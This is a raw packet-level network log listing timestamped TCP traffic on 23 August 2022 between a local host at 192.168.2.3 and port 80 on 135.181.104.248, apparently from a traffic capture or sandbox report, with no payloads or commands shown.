Aug 23, 2022 03:43:00.762940884 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.762963057 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.762976885 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.763003111 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.763005972 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.763044119 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.763083935 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.763101101 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.763124943 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.763130903 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.763166904 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.763176918 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.763206005 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.763207912 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.763247013 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.763247967 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.763288975 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.763326883 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.763370991 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.763384104 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.763400078 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.763442039 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.763479948 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.763498068 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.763520956 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.763524055 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.763565063 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.763569117 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.763602972 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.763606071 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.763643026 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.763683081 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.763684034 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.763722897 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.763763905 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.763772011 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.763803959 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.763818979 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.763847113 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.763889074 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.763890982 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.763927937 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.763968945 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.763976097 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.764008999 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.764019966 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.764048100 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.764087915 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.764097929 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.764127016 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.764168024 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.764174938 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.764209032 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.764246941 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.764256954 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.764286041 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.764324903 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.764349937 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.764364004 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.764369965 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.764404058 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.764410019 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.764444113 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.764446020 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.764482975 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.764527082 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.764549017 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.764564991 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.764579058 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.764605999 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.764616966 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.764647007 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.764683008 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.764686108 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.764697075 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.764725924 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.764729023 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.764769077 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.764775991 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.764810085 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.764811039 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.764852047 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.764890909 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.764899015 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.764930010 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.764971018 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.764974117 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.765010118 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.765048981 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.765057087 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.765088081 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.765093088 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.765109062 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.765135050 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.766068935 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.766112089 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.766150951 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.766190052 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.766222954 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.767436981 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.767481089 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.767505884 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.767520905 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.767539024 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.767563105 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.767576933 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.767602921 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.767641068 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.767666101 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.767678976 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.767683029 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.767952919 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.770550966 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.770692110 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.770724058 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.770739079 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.770754099 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.770807028 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.770822048 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.770837069 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.770859003 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.770869017 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.770869017 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.770900965 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.770911932 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.770930052 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.770932913 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.770961046 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.770966053 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.770981073 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.771008968 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.771013975 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.771043062 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.771074057 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.771105051 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.771111012 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.771136045 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.771156073 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.771189928 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.771224976 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.771226883 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.771254063 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.771308899 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.771327019 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.771378040 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.771408081 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.771411896 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.771431923 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.771437883 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.771478891 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.771488905 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.771491051 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.771564007 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.771615982 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.771646976 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.771676064 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.771706104 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.771708012 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.771737099 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.771739006 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.771768093 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.771789074 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.771797895 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.771825075 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.771871090 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.771872044 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.771924019 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.771955013 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.771972895 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.771986008 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.772006035 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.772017956 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.772078991 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.772109985 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.772125959 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.772140980 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.772162914 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.772192955 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.772231102 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.772260904 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.772277117 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.772290945 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.772305965 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.772320986 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.772351027 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.772365093 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.772381067 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.772399902 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.772417068 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.772430897 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.772459984 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.772481918 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.772516012 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.772567987 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.772569895 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.772618055 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.772666931 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.772681952 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.772717953 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.772727966 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.772751093 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.772763014 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.772802114 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.772804976 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.772833109 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.772861004 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.772862911 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.772891998 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.772892952 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.772908926 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.772943974 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.772952080 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.772995949 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.773015022 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.773066998 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.773071051 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.773117065 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.773166895 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.773188114 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.773237944 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.773266077 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.773293018 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.773296118 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.773305893 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.773325920 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.773344040 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.773356915 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.773371935 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.773387909 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.773416996 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.773442030 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.773446083 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.773462057 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.773475885 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.773499012 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.773508072 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.773531914 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.773540020 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.773560047 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.773571014 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.773602962 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.773633957 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.773663044 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.773663998 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.773693085 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.773704052 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.773724079 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.773737907 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.773751974 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.773755074 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.773777008 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.773783922 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.773797989 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.773813009 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.773843050 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.773869991 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.773874044 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.773904085 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.773905993 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.773935080 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.773936033 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.773947954 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.773966074 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.773993969 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.773994923 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.774023056 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.774024963 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.774034977 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.774055958 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.774076939 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.774086952 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.774108887 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.774126053 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.774153948 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.774184942 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.774188995 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.774215937 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.774215937 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.774240017 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.774246931 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.774259090 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.774276972 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.774286032 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.774308920 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.774337053 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.774353981 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.774368048 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.774378061 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.774398088 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.774410009 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.774430990 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.774461031 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.774477959 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.774490118 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.774504900 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.774521112 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.774533987 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.774550915 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.774594069 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.775718927 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.776549101 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.779613972 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.779647112 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.779673100 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.779690027 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.796169043 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.796262980 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.797529936 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.797635078 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.802823067 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.802880049 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.802901030 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.802918911 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.802951097 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.802958012 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.802973986 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.802998066 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.803009033 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.803039074 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.803067923 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.803076029 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.803082943 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.803112984 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.803150892 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.803164005 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.803188086 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.803224087 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.803258896 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.803261995 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.803272963 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.803306103 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.803307056 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.803412914 CEST	80	49812	135.181.104.248	192.168.2.3
